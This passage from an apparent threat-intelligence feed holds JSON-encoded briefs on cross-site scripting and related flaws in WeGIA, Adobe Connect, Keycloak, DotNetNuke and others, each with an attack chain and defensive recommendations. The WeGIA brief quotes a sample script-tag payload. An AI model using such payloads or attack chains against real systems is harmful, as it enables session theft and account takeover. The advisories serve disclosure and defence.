This vulnerability was reported on April 17, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable WeGIA instance running a version prior to 3.6.10.\u003c/li\u003e\n\u003cli\u003eThe attacker accesses the \u0026lsquo;Member Registration\u0026rsquo; (Cadastrar Sócio) page.\u003c/li\u003e\n\u003cli\u003eIn the \u0026lsquo;Member Name\u0026rsquo; (Nome Sócio) field, the attacker injects a malicious JavaScript payload (e.g., \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;);\u0026lt;/script\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker submits the registration form.\u003c/li\u003e\n\u003cli\u003eThe WeGIA application stores the malicious payload in the database without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA legitimate user navigates to a page displaying the compromised \u0026lsquo;Member Name\u0026rsquo; field, such as a member profile page.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript code is executed within the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as stealing cookies or redirecting the user to a malicious website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability could lead to a range of consequences, including account compromise, data theft, and website defacement. An attacker could steal session cookies and impersonate legitimate users, gaining unauthorized access to sensitive information.  
Because the flaw lies in the web application, the impact is confined to its users; their sensitive information may be exposed, and an attacker who hijacks a privileged session could modify the application itself.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade WeGIA installations to version 3.6.10 or later to remediate CVE-2026-40286.\u003c/li\u003e\n\u003cli\u003eValidate all user-supplied data on input and apply context-aware output encoding wherever it is rendered, especially the \u0026lsquo;Member Name\u0026rsquo; field; output encoding is what stops a stored payload from executing, since input validation alone can be bypassed.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect WeGIA XSS Attempt via HTTP Request\u003c/code\u003e to detect potential XSS payloads in HTTP requests.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and monitor for suspicious activity, such as unusual characters or script tags in HTTP request parameters, to identify potential XSS attempts. If the registration form is submitted via POST, the payload will not appear in access-log URI fields; body inspection at a WAF or reverse proxy is needed to see it.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T21:16:34Z","date_published":"2026-04-17T21:16:34Z","id":"/briefs/2026-04-wegia-xss/","summary":"A stored Cross-Site Scripting (XSS) vulnerability exists in WeGIA versions prior to 3.6.10, allowing attackers to inject malicious scripts into the 'Member Name' field during member registration, leading to persistent execution upon user access.","title":"WeGIA Stored Cross-Site Scripting Vulnerability (CVE-2026-40286)","url":"https://feed.craftedsignal.io/briefs/2026-04-wegia-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cisco","unity-connection","vulnerability","xss","data-manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCisco Unity Connection is susceptible to multiple vulnerabilities that can be exploited by malicious actors. 
Successful exploitation of these vulnerabilities could allow attackers to perform cross-site scripting (XSS) attacks, redirect users to attacker-controlled malicious websites, manipulate sensitive data, and achieve unauthorized disclosure of confidential information. The vulnerabilities affect Cisco Unity Connection, a unified communications platform. These vulnerabilities pose a significant risk to organizations relying on Cisco Unity Connection for voice messaging and unified communications. Defenders need to implement detection and prevention measures to mitigate potential attacks targeting these flaws.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Cisco Unity Connection server.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL or injects malicious code into a field accessible via the web interface.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the crafted URL or interacts with the injected code through the Unity Connection web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script executes within the user\u0026rsquo;s browser session (XSS).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the XSS vulnerability to redirect the user to a malicious website designed to harvest credentials or install malware.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker leverages the vulnerability to manipulate data stored within Cisco Unity Connection, such as user profiles or configuration settings.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits the vulnerability to gain unauthorized access to sensitive information, such as user credentials, call logs, or system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information for further malicious activities, such as gaining unauthorized access to other systems or conducting fraudulent activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to a range of detrimental outcomes, including unauthorized access to sensitive data, manipulation of critical system configurations, and redirection of users to malicious websites. This can result in data breaches, financial losses, reputational damage, and disruption of communication services. While the exact number of potential victims is unknown, organizations utilizing vulnerable versions of Cisco Unity Connection are at risk. The impact spans various sectors that rely on this technology for unified communications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for unusual URL patterns or requests containing suspicious characters indicative of XSS attempts targeting Cisco Unity Connection interfaces.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to detect and block common XSS attack vectors to protect Cisco Unity Connection web interfaces.\u003c/li\u003e\n\u003cli\u003eMonitor Cisco Unity Connection logs for any unauthorized modifications to user profiles or system configurations, which could indicate successful exploitation of data manipulation vulnerabilities.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious URI parameters in Cisco Unity Connection\u003c/code\u003e to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T11:13:57Z","date_published":"2026-04-16T11:13:57Z","id":"/briefs/2026-04-cisco-unity-vulns/","summary":"Multiple vulnerabilities in Cisco Unity Connection can be exploited by an attacker to conduct cross-site scripting attacks, redirect users to malicious websites, manipulate data, and disclose confidential information.","title":"Multiple Vulnerabilities in Cisco Unity 
Connection","url":"https://feed.craftedsignal.io/briefs/2026-04-cisco-unity-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2026-4344"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","autodesk","cve-2026-4344"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stored cross-site scripting (XSS) vulnerability, identified as CVE-2026-4344, affects the Autodesk Fusion desktop application. The vulnerability occurs due to insufficient sanitization of component names. A malicious actor can inject a crafted HTML payload into a component\u0026rsquo;s name. When a user attempts to delete the component, the malicious payload is displayed within the delete confirmation dialog. If the user interacts with the crafted HTML, the XSS vulnerability is triggered, potentially leading to local file reads or arbitrary code execution within the context of the Autodesk Fusion process. This vulnerability poses a significant risk as it could allow attackers to compromise a user\u0026rsquo;s system through a seemingly benign action within the application.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious HTML payload.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the crafted HTML payload into a component name within Autodesk Fusion.\u003c/li\u003e\n\u003cli\u003eA user attempts to delete the component with the malicious name.\u003c/li\u003e\n\u003cli\u003eThe Autodesk Fusion application displays a delete confirmation dialog containing the malicious HTML payload.\u003c/li\u003e\n\u003cli\u003eThe user clicks or interacts with the malicious HTML payload within the delete confirmation dialog.\u003c/li\u003e\n\u003cli\u003eThe XSS vulnerability is triggered, allowing the attacker to execute arbitrary JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the XSS vulnerability to read local files or execute arbitrary code 
within the context of the Autodesk Fusion process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access or control over the user\u0026rsquo;s system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-4344 allows a malicious actor to execute arbitrary code within the context of the Autodesk Fusion application. Because the dialog is rendered by a web view embedded in a desktop application rather than in a sandboxed browser tab, script running there inherits the privileges of the Fusion process, which is why the impact extends to reading local files, modifying sensitive data, or even gaining complete control over the user\u0026rsquo;s system. Due to the widespread use of Autodesk Fusion in engineering and design sectors, this vulnerability could potentially impact a large number of users and organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply Autodesk\u0026rsquo;s security update addressing CVE-2026-4344; check the vendor advisory for the fixed Fusion build.\u003c/li\u003e\n\u003cli\u003eMonitor process creations originating from the Autodesk Fusion process (process_creation, product: windows/macos) for suspicious command-line arguments that may indicate exploitation.\u003c/li\u003e\n\u003cli\u003eInspect Autodesk Fusion application logs (if available) for events related to component deletion and HTML rendering, searching for unusual or potentially malicious HTML tags (webserver, product: linux/windows).\u003c/li\u003e\n\u003cli\u003eAllow Autodesk Fusion installers to be fetched only from Autodesk\u0026rsquo;s official download URLs (iocs, type: url) and block installer downloads from any other source at the network level, so that attackers cannot distribute trojanized copies of the software.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T12:00:00Z","date_published":"2026-04-15T12:00:00Z","id":"/briefs/2026-04-autodesk-xss/","summary":"CVE-2026-4344 is a stored cross-site scripting (XSS) vulnerability in the Autodesk Fusion desktop application where a malicious HTML payload in a component name, when displayed during the delete confirmation dialog and clicked by a user, can lead to arbitrary code execution.","title":"Autodesk Fusion Stored XSS Vulnerability 
(CVE-2026-4344)","url":"https://feed.craftedsignal.io/briefs/2026-04-autodesk-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["ansible","redhat","vulnerability","dos","xss","code-execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities exist in Red Hat Ansible Automation Platform that could be exploited by a remote, anonymous attacker. The vulnerabilities span a wide range of potential impacts, including denial of service (DoS), arbitrary code execution, security bypass, data manipulation, information disclosure, and cross-site scripting (XSS). While the specific CVEs are not detailed, the broad range of potential exploits suggests a critical need for patching and mitigation. The lack of specific targeting information implies a widespread threat affecting any organization utilizing the Red Hat Ansible Automation Platform. Given the potential for arbitrary code execution and data manipulation, a successful attack could lead to significant operational disruption and data breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable endpoint or component within the Red Hat Ansible Automation Platform accessible remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability, such as a flaw in input validation, to inject malicious code or scripts.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial exploit to achieve arbitrary code execution on the target system.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges to gain control over the Ansible Automation Platform instance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised platform to manipulate automation workflows and configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys malicious playbooks to managed hosts, leading to further 
compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data from the compromised hosts or the Ansible Automation Platform database.\u003c/li\u003e\n\u003cli\u003eThe attacker launches denial-of-service attacks against critical infrastructure components, disrupting operations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could have severe consequences. A denial-of-service attack could disrupt critical automation processes, leading to significant operational downtime. Arbitrary code execution could allow an attacker to gain complete control over the Ansible Automation Platform and managed hosts. Data manipulation could compromise the integrity of critical systems and data. Information disclosure could expose sensitive credentials and internal data. Cross-site scripting could be used to target administrators and users of the platform. The lack of specific victimology makes it difficult to estimate the number of potential victims, but the widespread use of Ansible suggests that a successful exploit could have a broad impact across numerous sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview Red Hat security advisories related to Ansible Automation Platform and apply the necessary patches immediately to remediate potential vulnerabilities as they become available.\u003c/li\u003e\n\u003cli\u003eImplement strong input validation and output encoding to prevent code injection and cross-site scripting attacks.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity indicative of exploitation attempts, focusing on requests targeting the Ansible Automation Platform web interface.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential exploitation attempts and malicious activity on the Ansible Automation Platform server (see 
rules section).\u003c/li\u003e\n\u003cli\u003eReview and harden the security configuration of the Ansible Automation Platform to minimize the attack surface.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit the exposure of sensitive data and functionality.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T11:37:19Z","date_published":"2026-04-15T11:37:19Z","id":"/briefs/2026-04-redhat-ansible-vulns/","summary":"A remote, anonymous attacker can exploit multiple vulnerabilities in Red Hat Ansible Automation Platform to perform denial of service, execute arbitrary code, bypass security measures, manipulate data, disclose information, or conduct XSS attacks.","title":"Multiple Vulnerabilities in Red Hat Ansible Automation Platform","url":"https://feed.craftedsignal.io/briefs/2026-04-redhat-ansible-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["keycloak","xss","cross-site scripting","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA Cross-Site Scripting (XSS) vulnerability exists within Keycloak, a widely-used open-source identity and access management solution. This vulnerability allows a remote, authenticated attacker to inject malicious scripts into web pages viewed by other users. The attacker must possess valid credentials to initially access the vulnerable Keycloak instance. While the specific version affected is not provided in this advisory, it\u0026rsquo;s crucial for organizations using Keycloak to investigate and apply necessary patches or mitigations. The impact of successful exploitation ranges from defacement to sensitive data theft and account compromise. 
Defenders should prioritize patching Keycloak installations and implementing input validation to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Keycloak instance with valid credentials.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a vulnerable input field or parameter within the Keycloak application (e.g., user profile, group name, etc.).\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eAttacker injects the malicious payload into the vulnerable input field.\u003c/li\u003e\n\u003cli\u003eThe Keycloak application stores the malicious payload without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA victim user (e.g., another authenticated user or an administrator) accesses the page containing the injected payload.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker can then steal cookies, redirect the user to a malicious site, or perform other actions on behalf of the victim.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to several negative consequences. An attacker could potentially steal session cookies, allowing them to impersonate other users, including administrators. This could grant them unauthorized access to sensitive data, configuration settings, and management functions. Furthermore, the attacker could deface the Keycloak interface, inject phishing scams, or redirect users to malicious websites. 
The number of victims depends on the number of users accessing the page with the injected XSS payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the Keycloak release that fixes this issue as soon as it is identified; the underlying fix is input validation and output encoding inside Keycloak itself. As defence in depth, operators can set a restrictive Content-Security-Policy header under the realm\u0026rsquo;s Security Defenses settings.\u003c/li\u003e\n\u003cli\u003eEnable Keycloak admin events (with representations included) and user events, and review them for profile, group, or client attribute changes containing script fragments; because the attacker must be authenticated, these events name the account that injected the payload.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect possible XSS attempts in Keycloak logs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T07:33:56Z","date_published":"2026-04-15T07:33:56Z","id":"/briefs/2026-04-keycloak-xss/","summary":"An authenticated remote attacker can exploit a vulnerability in Keycloak to perform a Cross-Site Scripting attack, potentially leading to unauthorized access and data compromise.","title":"Keycloak Cross-Site Scripting Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2026-34617"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["adobe-connect","xss","cve-2026-34617","privilege-escalation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAdobe Connect versions 2025.3, 12.10, and prior are vulnerable to a Cross-Site Scripting (XSS) attack, identified as CVE-2026-34617. This vulnerability allows a low-privileged attacker to inject malicious scripts into a web page viewed by other users. Successful exploitation requires user interaction, such as clicking a crafted URL or interacting with a compromised page within the Adobe Connect environment. The vulnerability could allow an attacker to gain elevated access or control over a victim\u0026rsquo;s account or session. 
Defenders should prioritize patching and consider mitigations to prevent exploitation of this flaw across all platforms where Adobe Connect is deployed.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a payload designed to exploit the XSS vulnerability in Adobe Connect.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL to potential victims through phishing or other social engineering methods.\u003c/li\u003e\n\u003cli\u003eA user clicks on the malicious URL, which directs their browser to an Adobe Connect page.\u003c/li\u003e\n\u003cli\u003eThe injected XSS payload is executed within the user\u0026rsquo;s browser, leveraging the context of the Adobe Connect application.\u003c/li\u003e\n\u003cli\u003eThe malicious script may steal the user\u0026rsquo;s session cookie, allowing the attacker to hijack their session.\u003c/li\u003e\n\u003cli\u003eAlternatively, the script might modify the content of the Adobe Connect page, tricking the user into performing actions that benefit the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the hijacked session or manipulated actions to gain elevated privileges within the Adobe Connect platform.\u003c/li\u003e\n\u003cli\u003eWith elevated privileges, the attacker can access sensitive data, modify configurations, or perform other malicious actions, impacting other users and the system\u0026rsquo;s integrity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-34617 allows an attacker to escalate privileges within Adobe Connect. This can lead to unauthorized access to sensitive information, modification of meeting content, and disruption of services. The scope of the impact depends on the level of access achieved by the attacker, potentially affecting all users within the compromised Adobe Connect instance. 
Given a CVSS v3.1 base score of 8.7, this vulnerability presents a significant risk to organizations using affected versions of Adobe Connect.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately patch Adobe Connect installations to the latest version to remediate CVE-2026-34617.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to detect and block common XSS payloads in HTTP requests to Adobe Connect servers.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of clicking on suspicious links and the importance of verifying the legitimacy of URLs before interacting with them.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to your SIEM to detect potential exploitation attempts targeting CVE-2026-34617.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and monitor for suspicious HTTP requests containing potential XSS payloads, focusing on the cs-uri-query and cs-uri-stem fields.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T18:17:36Z","date_published":"2026-04-14T18:17:36Z","id":"/briefs/2026-04-adobe-connect-xss/","summary":"Adobe Connect versions 2025.3, 12.10, and earlier are susceptible to a Cross-Site Scripting (XSS) vulnerability (CVE-2026-34617) that can lead to privilege escalation if a user interacts with a malicious URL or compromised web page.","title":"Adobe Connect XSS Vulnerability Leading to Privilege Escalation","url":"https://feed.craftedsignal.io/briefs/2026-04-adobe-connect-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.3,"id":"CVE-2026-27245"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","adobe-connect","cve-2026-27245","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA reflected Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-27245, affects Adobe Connect versions 2025.3, 12.10, and earlier. 
This vulnerability allows an attacker to inject malicious JavaScript code into a user\u0026rsquo;s browser by convincing them to click on a specially crafted URL. When the victim visits the malicious URL, the injected script executes within their browser session, potentially enabling the attacker to steal cookies, redirect the user to a malicious website, or deface the web page. This vulnerability poses a significant risk to Adobe Connect users, as it can lead to account compromise and data breaches. Exploitation requires user interaction, but the impact can be severe.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a JavaScript payload within a parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL via email, social media, or other means to a targeted user.\u003c/li\u003e\n\u003cli\u003eThe victim clicks on the malicious link, unknowingly initiating the XSS attack.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser sends a request to the Adobe Connect server with the malicious JavaScript in the URL.\u003c/li\u003e\n\u003cli\u003eThe Adobe Connect server reflects the malicious JavaScript code back to the user\u0026rsquo;s browser without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the reflected JavaScript code within the context of the Adobe Connect application.\u003c/li\u003e\n\u003cli\u003eThe attacker can then steal the victim\u0026rsquo;s session cookies.\u003c/li\u003e\n\u003cli\u003eUsing the stolen cookies, the attacker can hijack the victim\u0026rsquo;s session, gaining unauthorized access to their Adobe Connect account and data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this reflected XSS vulnerability (CVE-2026-27245) in Adobe Connect could lead to unauthorized access to user accounts, 
sensitive data, and the Adobe Connect environment. An attacker could potentially deface web pages, redirect users to phishing sites, or inject malware. The impact ranges from user-specific data theft to wider compromise of the Adobe Connect platform. While the number of victims is unknown, any organization using the affected Adobe Connect versions is vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched version of Adobe Connect that addresses CVE-2026-27245. Refer to the vendor advisory at \u003ca href=\"https://helpx.adobe.com/security/products/connect/apsb26-37.html\"\u003ehttps://helpx.adobe.com/security/products/connect/apsb26-37.html\u003c/a\u003e for specific upgrade instructions.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Adobe Connect XSS Attempt via URI\u003c/code\u003e to identify requests containing suspicious JavaScript payloads targeting Adobe Connect.\u003c/li\u003e\n\u003cli\u003eEducate users to be cautious about clicking on URLs received from untrusted sources to mitigate the initial access vector.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual URI patterns and JavaScript-like syntax using the \u003ccode\u003eDetect Reflected XSS Payloads in URI\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T18:16:55Z","date_published":"2026-04-14T18:16:55Z","id":"/briefs/2024-02-adobe-connect-xss/","summary":"Adobe Connect versions 2025.3, 12.10, and earlier are vulnerable to a reflected Cross-Site Scripting (XSS) attack, enabling attackers to execute malicious JavaScript in a victim's browser by enticing them to visit a crafted URL.","title":"Adobe Connect Reflected XSS Vulnerability 
(CVE-2026-27245)","url":"https://feed.craftedsignal.io/briefs/2024-02-adobe-connect-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["dotnetnuke","xss","svg","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDotNetNuke.Core versions prior to 10.2.2 are vulnerable to stored cross-site scripting (XSS). An attacker can exploit this vulnerability by uploading a malicious SVG file to the DotNetNuke server. This file contains embedded JavaScript that executes when the SVG is processed and displayed by the application. Successful exploitation requires a user to interact with the uploaded SVG file, which then triggers the malicious script execution. This poses a significant risk as the injected scripts can target both authenticated and unauthenticated users, potentially leading to session hijacking, data theft, or unauthorized actions performed on behalf of the victim. This vulnerability was published on April 10, 2026, and patched in version 10.2.2.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious SVG file containing embedded JavaScript code designed for XSS exploitation.\u003c/li\u003e\n\u003cli\u003eThe attacker, with low privileges, uploads the malicious SVG file to the DotNetNuke server through a file upload functionality.\u003c/li\u003e\n\u003cli\u003eThe server stores the SVG file, making it accessible to other users.\u003c/li\u003e\n\u003cli\u003eA user (either authenticated or unauthenticated) navigates to the location where the SVG file is stored or displayed.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser processes the SVG file, triggering the execution of the embedded JavaScript.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes within the user\u0026rsquo;s browser session, gaining access to cookies, session tokens, and other sensitive 
information.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the user\u0026rsquo;s cookies and session tokens.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session tokens to hijack the user\u0026rsquo;s session, perform unauthorized actions, and potentially escalate privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability allows an attacker to execute arbitrary JavaScript code within the context of a user\u0026rsquo;s session. This can lead to sensitive information disclosure, such as stealing user credentials or session cookies. An attacker can then hijack user sessions, perform unauthorized actions on their behalf, and potentially gain elevated privileges within the DotNetNuke application. Due to the nature of stored XSS, the impact can be widespread, affecting any user who interacts with the malicious SVG file until the vulnerability is patched.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade DotNetNuke.Core to version 10.2.2 or later to patch the XSS vulnerability (reference: Affected versions).\u003c/li\u003e\n\u003cli\u003eImplement server-side validation to sanitize uploaded SVG files and prevent the injection of malicious scripts (reference: Description).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect attempts to upload SVG files containing JavaScript code (reference: Sigma rule \u0026ldquo;Detect SVG Upload with Embedded JavaScript\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eConfigure web application firewalls (WAFs) to inspect and block suspicious SVG uploads based on content analysis (reference: Description).\u003c/li\u003e\n\u003cli\u003eEnable logging for file uploads to track potential malicious activity (reference: logsource category 
\u0026ldquo;file_event\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-dotnetnuke-xss/","summary":"DotNetNuke.Core is vulnerable to stored cross-site scripting (XSS) where a user can upload a specially crafted SVG file containing malicious scripts, potentially targeting both authenticated and unauthenticated DNN users, with successful exploitation requiring user interaction and leading to high impact on confidentiality, integrity, and availability.","title":"DotNetNuke.Core Stored XSS via SVG Upload","url":"https://feed.craftedsignal.io/briefs/2026-04-dotnetnuke-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2025-58920"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA reflected XSS vulnerability, identified as CVE-2025-58920, affects the Zootemplate Cerato WordPress theme. The vulnerability resides in versions ranging from n/a through 2.2.18. It stems from the improper neutralization of input during web page generation, which can allow an attacker to inject malicious scripts into a web page viewed by other users. Successful exploitation could allow an attacker to steal cookies, redirect users to malicious websites, or deface web pages. 
Given the widespread use of WordPress and its themes, this vulnerability poses a risk to websites using the affected Cerato theme.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable endpoint within the Cerato theme that does not properly sanitize user input.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a JavaScript payload within a parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious URL via email, social media, or other means.\u003c/li\u003e\n\u003cli\u003eA victim clicks the malicious URL, sending a request to the vulnerable WordPress site.\u003c/li\u003e\n\u003cli\u003eThe WordPress server, using the Cerato theme, reflects the attacker\u0026rsquo;s JavaScript payload in the response without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to perform actions on behalf of the victim, such as stealing cookies or redirecting the user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this reflected XSS vulnerability can lead to several adverse effects. An attacker could steal a user\u0026rsquo;s session cookies, gaining unauthorized access to their account. Victims can be redirected to phishing sites, potentially compromising their credentials. Further, attackers might inject malicious content into the web page, 